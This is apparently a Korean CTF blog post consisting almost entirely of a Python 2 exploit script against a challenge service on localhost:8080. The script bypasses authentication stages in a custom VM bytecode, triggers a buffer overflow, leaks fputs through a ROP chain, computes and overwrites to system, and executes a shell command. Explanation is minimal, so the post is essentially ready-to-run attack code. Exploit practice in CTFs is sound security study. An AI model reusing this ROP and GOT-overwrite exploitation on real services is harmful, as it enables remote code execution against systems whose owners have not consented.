우분투 12.04에서 재현
- from socket import *
- from struct import *
- import time
- fputs_plt = 0x8048800
- fputs_got = 0x804B064
- recv_plt = 0x8048810
- send_plt = 0x8048830
- ppppr = 0x80499FC
- bss = 0x804c0dc
- cmd = "id>&4\x00"
- i=0
- while True:
- print "Send! %d" % i
- i += 1
- s = socket(AF_INET, SOCK_STREAM)
- s.connect(('localhost',8080))
- time.sleep(0.3)
- print s.recv(10000)
- #raw_input('go?')
- vmcode = ""
- # auth 2
- vmcode += "#\x00\x00\x00\x00"*1024 # index + 4*
- vmcode += ("P\x10"+"$\x08")*8 # get secret
- vmcode += "P\x10"
- vmcode += "9R"
- # auth 3
- vmcode += "\x91"
- vmcode += pack('<L',0xdeadbeef)*2
- # overflow
- vmcode += "\xef"
- vmcode += "A"*0x20
- # ROP
- vmcode += pack('<L',send_plt)
- vmcode += pack('<L',ppppr)
- vmcode += pack('<L',4)
- vmcode += pack('<L',fputs_got)
- vmcode += pack('<L',4)
- vmcode += pack('<L',0)
- vmcode += pack('<L',recv_plt)
- vmcode += pack('<L',ppppr)
- vmcode += pack('<L',4)
- vmcode += pack('<L',fputs_got)
- vmcode += pack('<L',4)
- vmcode += pack('<L',0)
- vmcode += pack('<L',recv_plt)
- vmcode += pack('<L',ppppr)
- vmcode += pack('<L',4)
- vmcode += pack('<L',bss)
- vmcode += pack('<L',len(cmd))
- vmcode += pack('<L',0)
- vmcode += pack('<L',fputs_plt)
- vmcode += "AAAA"
- vmcode += pack('<L',bss)
- s.send(vmcode + " "*(0x400*6 - len(vmcode)))
- try:
- fputs_addr = unpack('<L',s.recv(4))[0]
- except:
- continue
- system_addr = fputs_addr - 0x66100 + 0x3f430
- print "System: "+hex(system_addr)
- s.send(pack('<L',system_addr))
- s.send(cmd)
- out = s.recv(65000)
- if "uid" in out:
- print out
- break
- s.close()
'Computer Security > CTF' 카테고리의 다른 글
| [Codegate 2014 quals] Web 500 write up (0) | 2014.02.24 |
|---|---|
| [secuinside 2013] debugd exploit (2) | 2013.11.28 |
| Whitehat Contest 개인전 예선 보고서 (2) | 2013.09.12 |
| [DIMVA 2013] pwn 200 exploit (0) | 2013.07.23 |
| [DIMVA 2013] pwn 100 exploit (0) | 2013.07.23 |